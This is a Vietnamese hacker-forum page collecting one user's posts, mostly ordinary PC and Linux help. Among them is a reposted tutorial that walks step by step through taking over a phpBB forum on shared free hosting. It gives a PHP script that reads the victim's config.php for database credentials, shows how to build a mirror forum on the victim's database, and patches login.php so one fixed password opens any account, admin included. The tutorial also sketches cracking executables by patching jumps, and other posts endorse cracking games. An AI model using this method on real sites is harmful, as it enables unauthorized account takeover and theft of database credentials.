banner

[Rule] Rules  [Home] Main Forum  [Portal] Portal  
[Members] Member Listing  [Statistics] Statistics  [Search] Search  [Reading Room] Reading Room 
[Register] Register  
[Login] Loginhttp  | https  ]
 
Messages posted by: Hts  XML
Profile for Hts Messages posted by Hts [ number of posts not being displayed on this page: 4 ]
 
Có trường hợp củ chuối: cắm đằng trước case nó báo thế. Cắm ra sau lại được?

Có ai biết tại sao ko?
Yêu cầu phần cứng: có ổ DVD
Yêu cầu phần mềm: Chỉ cần một cái OS là đủ. Sao chép như thường.

Hoặc dùng Alcohol để tạo file ISO.

posiden wrote:

làm sao có thể view được index của thư mục mà kô được phép
 

Bó tay. Em chưa tu đến tầng công lức này.

posiden wrote:
có thể giới thiệu cho tôi biết intellitamper_v2.07 có cơ chế làm việc thế nào không?
 


Đang tìm hiểu. Chưa hiểu rõ-> Không dám nói liều.

Thuongtamnhan wrote:
cracker giỏi hơn hacker vài lần , carcker có kiến thức sâu hơn nhiều hơn , cứ học lập trình thật giỏi là cái gì cũng ok 


Tớ ko đồng ý với ý kiến này. Tớ học cả hack lẫn crack. Thời gian học crack chỉ chiếm 30% nhưng lại đạt nhiều kết quả hơn hack. Ban đầu tớ cũng nhận định như bạn nhưng bây giờ thấy crack dẽ hơn nhiều. smilie
intellitamper_v2.07

Thử coi nhé
Bạn tìm hộ tớ quyển: "Trở thành Bill Gates trong 10 ngày" nhé. Cảm ơn trước. smilie
Nội dung bài viết của Admin trên diễn đàn HVA -2002

###### Header Begin
Project Name: How to hack a localsite
Founder: Luke/Lukos
Found day: 31/08/2002
Use for Education and Experiences Only
###### Header End
Rất tình cờ, khi học PHP tôi tìm ra một cách để hack được một số Web Portal hoặc forum của hầu hết các free hosting như lycos.co.uk vv. Và tỉ lệ thành công là 100% tuy hơi mất thời gian
Trước hết cách này gần như kiểu hack qua Local Exploit để lấy Root's passwd, cái này chắc nhiều bạn cũng đã biết nhưng cũng khác chút ít. Vì vậy tôi cũng chỉ xin lấy một ví dụ là hack phpBB forum để làm mẫu chung cho các kiểu Portal hay forum khác.



Bước 1. Xác định URL website cần hack.
Do đây là free hosting nên website luôn có dạng http://root/yoursite
Và giả sử forum phpBB nằm tại URL sau http://root/victim/phpBB_path/
Chú ý là phải tìm đúng URL Root chứ không phải wwwect hay forward ..
Bước 2. Đăng kí một hosting cùng trên server đó.
Vì đây là free hosting nên nếu victim đăng kí được thì bạn cũng có thể đăng kí dễ dàng
Giả sử bạn đăng kí một hosting như sau http://root/mysite/
Bước 3 Xác định DB info của Victim
Điều này rất dơn giản khi bạn với victim đang cùng trên một Local
Thật vậy có thể là /home/user_root/public_html/mysite/ hay /home/user_root/httpdocs/mysite/ tuỳ thuộc Control Panel của Server là lọai gì (Cpanel, Plesk, Enxim..). Nhưng điều này không cần chú ý.
3.1 Bạn tạo một file để lấy DB info của victim như sau
## getdb.php begin
<?php
$fd = fopen ("../victim/phpBB_path/config.php", "r");
while (!feof ($fd)) {
$line = fgets($fd,4000);
print $line;
}
fclose ($fd);
?>
## getdb.php end
Bạn có thể thay $fd bằng đường dẫn tới bất kì file php mà bạn muốn xem mã nguồn của nó. Vì đối với các loại Portal hoặc forum khác có thể DB Info không chứa trong file config.php như của phpBB
3.2 Upload file getdb.php
Bạn chỉ việc upload lên hosting mà bạn vừa đăng kí http://root/mysite/getdb.php
3.3 Lấy DB info của victim
Chạy file getdb.php vừa rồi trên Browser của bạn. Bạn sẽ thấy một màn hình trắng (blank). Đừng lo, bạn hãy "View source" và bạn sẽ thấy được các thông tin như sau
## getdb.php's source begin
<?php
//
// phpBB 2.x auto-generated config file
// Do not change anything in this file!
//
$dbms = "mysql4";
$dbhost = "localhost";
$dbname = "DB name here";
$dbuser = "DB user here";
$dbpasswd = "DB passwd here";
$table_prefix = "phpbb_";
define('PHPBB_INSTALLED', true);
?>
## getdb.php's source end
Xong bước thứ 3
Bước 4. Kiểm tra mật khẩu mà bạn vừa lấy được.
Với nick Admin trong forum và tất cả những gì có thể liên quan như passwd e-mail, hosting, domain .. Vì có thể nạn nhân dùng 1 passwd cho tất cả những mật khẩu của mình cho đỡ quên. Đây là một trong những thói quen chết người
Nếu mà thành công thì dừng tại đây nếu không hãy sang bước thứ 5
Bước 5. Tạo một mirror phpBB forum.
5.1 Nghĩa là sao, bạn hãy upload một phpBB forum cùng phiên bản với victim vào hosting của bạn http://root/mysite/
Và đừng Install forum này nếu bạn muốn hack nó.
5.2 Config forum vừa upload
Bạn hãy config cho forum của bạn thực sự là một mirror của victim's forum.
Điều đó có nghĩa là bạn phải link DB đến DB của victim, điều đó thật dễ dàng khi bạn đã có được DB info của victim trong tay.
5.2.1 Tạo file config.php
Đó là toàn bộ những gì bạn vừa "view source" được
## config.php source begin
<?php
//
// phpBB 2.x auto-generated config file
// Do not change anything in this file!
//
$dbms = "mysql4";
$dbhost = "localhost";
$dbname = "DB name here";
$dbuser = "DB user here";
$dbpasswd = "DB passwd here";
$table_prefix = "phpbb_";
define('PHPBB_INSTALLED', true);
?>
## config.php source end
5.2.2 Upload config.php
Bạn upload đè lên file config.php trong cái forum mới toanh mà bạn vừa upload.
http://root/mysite/config.php
5.2.3 Thử lại
Bạn thử gõ http://root/mysite/ xem, nếu mà forum của bạn có các thông số y hệt như của http://root/victim/phpBB_path tức là bạn đã thành công bước này
Bước 6. Sửa mã nguồn Mirror Site
Mục đích bước này là bạn sẽ sửa mã nguồn forum của bạn đề bạn có thể Login vào được Admin panel của nó. Nếu bạn học PHP thì việc này khá dễ dàng.
Tôi xin nêu ra 1 phương pháp, đó là cách crack cổ điển.
6.1 Crack cổ điển
6.1.1
Đó là khi bạn muốn crack passwd 1 file exe, bạn có thể deassebler nó ra thành file.asm bằng nhiều chương trình hiện nay
6.1.2
Tìm các lệnh nhảy có điều kiện (JP gì gì đó. Cái này có hàng đống mà). của đoạn code dòi mật khẩu
6.1.3
Sửa thành lệnh nhảy không điều kiên
6.1.4
Compile lại thành file exe và OK. Ta nhập bất cứ mật khẩu nào vào nó cũng chấp nhận
6.2 Sửa mã nguồn
Sửa ở file login.php và sẽ cho phép bạn Login dưới mọi nickname bằng 1 passwd chọn sẵn
6.2.1 Chọn mật khẩu chung cho toàn bộ các nick.
Thực sự các mật khẩu trong phpBB đã được mà hoá theo kiểu MD5, do đó có thể rất khó khăn để có thể giải mã nó. Nếu các bạn hiểu rõ về kiêu encode này thì các bạn có thể tự tìm cho mình mật khẩu thích hợp, nếu không các bạn có thể sử dụng mật khẩu đã được tôi giải mã là: "hainam@hainam.org"
Cái địa chỉ mail của tôi ấy mà, khi mật khẩu này được mã hoá theo MD5 nó sẽ là một mật khẩu như sau "692e2c95b693cf6fbec8ea5c40536b9e"
hainam@hainam.org => 692e2c95b693cf6fbec8ea5c40536b9e
6.2.2 Thiết lập mật khẩu chung cho toàn bộ các nick
Trước hết bạn mở file login.php ra tìm đoạn sau
## file login.php ..
define("IN_LOGIN", true);
define('IN_PHPBB', true);
$phpbb_root_path = './';
include($phpbb_root_path . 'extension.inc');
include($phpbb_root_path . 'common.'.$phpEx);
## file login.php ..
Chèn thêm biến $hack = "692e2c95b693cf6fbec8ea5c40536b9e";
Tức là sửa đoanj mã đó thành
## file login.php ..
define("IN_LOGIN", true);
define('IN_PHPBB', true);
$phpbb_root_path = './';
include($phpbb_root_path . 'extension.inc');
include($phpbb_root_path . 'common.'.$phpEx);
$hack = "692e2c95b693cf6fbec8ea5c40536b9e";
## file login.php ..
Tiếp đó tìm đoạn mã sau
## file login.php ..
else
{
if( md5($password) == $row['user_password'] && $row['user_active'] )
{
$autologin = ( isset($HTTP_POST_VARS['autologin']) ) ? TRUE : 0;
## file login.php ..
Sửa đoạn mã đó thành
## file login.php ..
else
{
if( md5($password) == $hack && $row['user_active'] )
{
$autologin = ( isset($HTTP_POST_VARS['autologin']) ) ? TRUE : 0;
## file login.php ..
Ghi lại file login.php
Bước 7.Login User với mật khẩu đã chọn
Bây giờ bạn có thể login vào diễn đàn qua website của bạn http://root/mysite/login.php với bất cứ nickname nào bằng mật khẩu mà bạn đã chọn. Ở đây là "hainam@hainam.org" kể cả là nick Admin, và vào được Admin Panel ..
Chú ý rằng ở website của bạn thì User chỉ có thể login với mật khẩu là hainam@hainam.org chứ không thể bằng bât kì mật khẩu khác kể cả đó là mật khẩu đúng
Tổng quát
I/Phương Pháp
-Đây là một ví dụ cho việc hack các website khi trong một local, không chỉ riêng đối với phpBB mà có thể áp dụng được cho nhiều Portal hay forum khác, tuy nhiên để có thể hack được từng loại bạn đều phải hiểu rất kĩ về nó và tránh lạm dụng quá đáng.
-Cách hack này tuy mất nhiều thời gian trong việc upload một mirror nhưng rất hiệu quả. Tuy nhiên tuyệt đối không nên sử dụng chúng lung tung và bừa bãi.
-Các hosting cho phép free, điều đó chứng tỏ họ rất tốt bụng, cũng chính vì vậy cũng không nên sử dụng phương pháp này khi KHÔNG THỰC SỰ cần thiết
II/Ví dụ.
-Trước hết tôi xin lỗi những ai đã làm website **** vì tôi sẽ đưa website của các bạn ra làm ví dụ và đã là victim đầu tiên của tôi.
-Mong các bạn, những người đang muốn học hỏi thêm một chút kinh nghiệm chỉ tham qua chứ không lạm dụng gi để làm hỏng DataBase của họ, thực sự tôi đã backup nhưng tôi cũng rất ngại restore lại. Hơn nữa để đảm bảo cho các bài viết tiếp theo không bị phản đối, tôi mong mọi người hãy tôn trọng ý kiến của tôi, KHÔNG PHÁ PHÁCH GÌ DB CỦA VICTIM và mang mục đích học hỏi và tham khảo lên hang đầu.
-Website mirror của website**** là **** , tại đây các bạn có thể login vào bất cứ nickname nào trong diễn đàn **** với mật khẩu chung là "hainam@hainam.org" . hãy nhớ là KHÔNG NÊN PHÁ DB CỦA HỌ, chi nên tham khảo
III/Kinh nghiệm
Điều quan trọng không phải là chúng ta hack được những cái gì mà là chúng ta học được những cái gì. Qua bài viết này mong các bạn nắm rõ được một số thao tác sau
-Đọc mã nguồn của một file bất kì trên website khi đã cùng một server (Bước 3)
-Kinh nghiệm về mật khẩu, dò tìm và ghi nhớ (Bước 4)
-Cách tạo một mirror website hay là cách link DB cho nhiều website (Bước 5)
-Cách crack cổ điển bằng ASM (Bước 6.1)
Các bạn nên tìm ra các mối liên hệ giữa các Portal, Forum, Guest Book, Chatroom PHP-CGI,.. để có thể áp dụng phương pháp này. Mặt khác các bạn cũng có thể hack được ngay cả đối với các domain hosting chứ không phải là các site có dạng http://root/yoursite/ . Và Các Paid hosting cũng không ngaọi trừ khả năng bị hack nếu các hacker đã thực sự muốn hack và sẵn sang bỏ tiền mua một hosting trên cùng một Server. Phần hack paid hosting và domain tôi xin để cho các bạn tự tìm hiểu. Hãy nhớ rằng luôn luôn phải chú ý đến URL Root của mỗi hosting. Ví dụ như ở Cpanel thì URL Root cho các domain hosting là http://[IP Server]/~user .vv
Chúc các bạn thành công
Có thể do cài nhiều driver nên nạp lâu. Với lại WinXP SP2 khá nặng, trước đây mình dùng bản PRO (hổng SP chi hết) chạy nhanh cực. Ram lúc nào cũng chỉ dùng chừng 80MB, còn SP@ thì toàn trên 100 MB thui.
Mà có một nghịch lý thê này: mình đã từng dùng một con Hyper threading rùi nhưng disable nó đi thì chạy lại êm hơn? Có ai biết tại sao ko nhỉ?

Mình dùng AMD ~1.81 GHz Ram 512 đếm kỷ lục là 1.5 vòng.
Có thể do cài nhiều driver nên nạp lâu. Với lại WinXP SP2 khá nặng, trước đây mình dùng bản PRO (hổng SP chi hết) chạy nhanh cực. Ram lúc nào cũng chỉ dùng chừng 80MB, còn SP@ thì toàn trên 100 MB thui.
Mà có một nghịch lý thê này: mình đã từng dùng một con Hyper threading rùi nhưng disable nó đi thì chạy lại êm hơn? Có ai biết tại sao ko nhỉ?

Mình dùng AMD ~1.81 GHz Ram 512 đếm kỷ lục là 1.5 vòng.
Không có phần mềm nào là không thể crack.

Ngắn gọn thế thui
Nếu die ổ thì không cài được bất cứ OS nào hết.
Còn cài được Win2000 tức là ko die.
Bạn định nói cháy CHIP hay CHIPSET ?

Nếu cháy CHIP thì thay(nếu ko ảnh hưởng quá nhiều đến main).
Nếu cháy CHIPSET thì ...khóc. smilie).

Nếu hỏng main thì nên mua máy mới luôn đi. Tận dụng linh kiện cũ ko tiết kiệm bao nhiêu mà lại làm giảm công suất của cả hệ thống (bạn nói là Server). Main Foxconn hơi hiếm, với lại hãng này cũng ko có tiếng lắm đâu. Bạn nên chọn hãng khác.
Dùng khe cắm ram khi cần cắm thêm ram. Thế thui.

Câu hỏi của bạn lủng củng quá. Mình thấy nên ngắt nó làm 3 câu thì hay hơn. Mà hình như ý bạn muốn hỏi không phải là thế, đúng ko?
Đã ở trong linux thì hổng có chuyện vào DOS.
File EXE ko thể chạy trên nền linux,muốn chạy phải có trình giả lập. Wine là một ví dụ.
Chào cả nhà.
Do hàng tấn điều kiện, hôm qua em mới sờ vào dc bộ đĩa FC6. Vui chưa được 45p thì gặp một vài thắc mắc sau:

1.( Nguyên nhân của các thắc mắc còn lại)
Không tìm thấy chỗ chỉnh Fresh Rate đâu. Em vốn bị cận, nhìn thế nhức măt kinh khủng. Nó nhận được sound card, và cả card GeForce 6100.
Màn hình Samsung SynMaster551v( Ko thấy có trong list)

2. Tự khởi động vào GUI. Trong khi đang làm việc với chế độ đồ họa hổng tìm thấy menu nào cho mở dòng lệnh.

3.Khi cắm Modem56K vào ko tìm thấy chỗ thiết lập. Nó cũng ko báo là nó nhận thấy modem.

4. Các gói cài đặt đi kèm được đặt tên thiếu thân thiện quá (hổng như Window ). Mình ko rõ có thể dùng được những gì?

Mong anh em giúp đỡ.

Muốn tìm serial thì tự tìm đi. Cái này không dc thì tìm cái khác.
Trên đời có bao nhiêu phần mềm? Ai cũng hỏi thì HVA thành cái chi?
Đây là một trong những câu chuối nhất đấy

Tosmilieark_AngelVN
tmd ko có ý đó đâu, sao bạn lại có thể nói như vậy nhỉ?
Chào các bác.Em có thắc mắc nhỏ mong các bác giải đáp giúp:

Thắc măc 1:
Máy thật có cài XAMPP. Từ máy ảo có thể duyệt các file PHP bằng browse, nhưng sau khi bật máy ảo lên phải vào My network place> view all network conection> đợi khoảng 30s mới kết nối được. Trước đó, ko thể kết nối đến máy thật.(máy thật cũng ko thấy máy ảo)

Thắc mắc2:
Do cố tìm cách sửa lỗi trên em đã chữa "lợn què thành lợn...cụt". Bây giờ thì vẫn kết nối dc( tất nhiên sau khi đợi). Nhwng dùng lện net view thì hổng thấy máy kia đâu( cả 2 máy luôn). Nhwng ping thì vẫn thấy?

Cả 2 máy dùng windowXP SP1.

Mong các bác giải đáp giúp.
Ôi ko ai quan tam tới cau hỏi này à.......
CHÁN ĐỜI

frozen wrote:

nhưng nhìn xuống dười thì mình cũng hơn đc nhiều người.
 


Bao giờ bạn quên câu này đi thì mới có thể tiến bộ được.

Định hướng thì bạn có thể tìm trong box này, có nhiều lắm.

Xin lỗi vì đẵ lắm chuyện.
Làm cách nào để nhận biết một file đang được sử dụng bởi một tiến trình nào ko?

Có cách nào để "lừa" window rằng: "File này đang được sử dụng bởi tiến trình này" ko?

Mong anh em chỉ giúp.
Còn một cách "cổ điển" nữa là vặn case ra -> tháo cục pin -> đơi lâu nhất trong giới hạn bạn có thể ( Có người khuyên nên ít nhất 10' ). -> Lắp lại. Nếu may mắn thì sẽ hết.( Thường thì không may +_+).

MÔ PHẬT
Cấu hình như của bác Bigball_hacker hơi "thừa".
Mình nghĩ bạn nên đầu tư làm 2 loại:
Loại 1: như bác Bigball_hacker nói. Để chơi game cấu hình cao.

Loại 2: CPU AMD 3000+ , RAM 512 DDR2 HDD 40GB .Khỏi card rời luôn, dùng onbroad. Để chơi game nhẹ hơn và lướt net. Nên mua LCD 17 in.

MÔ PHẬT.

nam_haui wrote:

nhưng mà nếu không biết gì về nó thì đừng tò mò nghịch vào đấy kẻo teo luôn máy tính đó
 

Nếu ai cũng thế thì bao giời mới có người giỏi đây... Càng không biết thì phải càng băm bổ vào.

daudau wrote:

Mở registry :
Run/regedit
 

Mình nghĩ bạn hiểu nhầm rồi. Đây là registry của máy mình mà.( Đâu phải của victim đâu).
Hổng cần tool đâu!
Bạn có thể convert ngay trong win bằng lệnh:
convert tênổ /fs:ntfs

Các tham số khác bạn có thể tham khảo bằng cách gõ: convert /? trong CMD.
Chú ý: Nếu dùng cách này thì ver NTFS của bạn sẽ là 3.0. Bạn sẽ găpk khó khăn trong việc nhập partion này vời một partion khác có NTFS khác ver.

GOOD LUCK.

nthanhhuy wrote:
1.Đút cd vao ,và tiến hành cai đặt game ,sau ki cai đặt hoàn tất ,nhấp vào icon để chơi bên ngoìa destop thi nó báo "Please insert the corect CD ,choose OK and restart applicant" đại loại là như vậy. nhưng nếu Cd hư thi sao minh cài được ,
 

Cái này không phải do ổ hư đâu. Game phần lớn (99%) là đồ lậu vì thế nó cần dc cr@ck. Trong đĩa gảm bán ngoài thị trường chắc chắn có file cr@ck đi kèm vì thế bạn nên cr@ck nó trước, nếu ko có đĩa cũng vô dụng. Cr@ck xong nếu vẫn đòi thì làm ổ cd ảo sẽ ổn thôi.

Cái lỗi thứ 2 hơi khó hiểu phải sờ tận tay mới biết

quan_vu wrote:

Theo các anh em thì mình có thể thực hiện hack ở các máy ở dịch vụ Internet không. Mình ko có điều kiện để nối mạng nên mình định ra dịch vụ làm.
 

Tui toàn ra quán nghịch thui chẳng sao cả, chỉ tội mạng hơi tệ. Cứ nghịch đến khi nào thấy mình đến là thằng chủ quán nó dòm đểu thì ...đổi quán .

Cái này post ở "tán gẫu" thì hay hơn
 
Go to Page:  First Page 1 2 3 5 6 7 Last Page

Powered by JForum - Extended by HVAOnline
 hvaonline.net  |  hvaforum.net  |  hvazone.net  |  hvanews.net  |  vnhacker.org
1999 - 2013 © v2012|0504|218|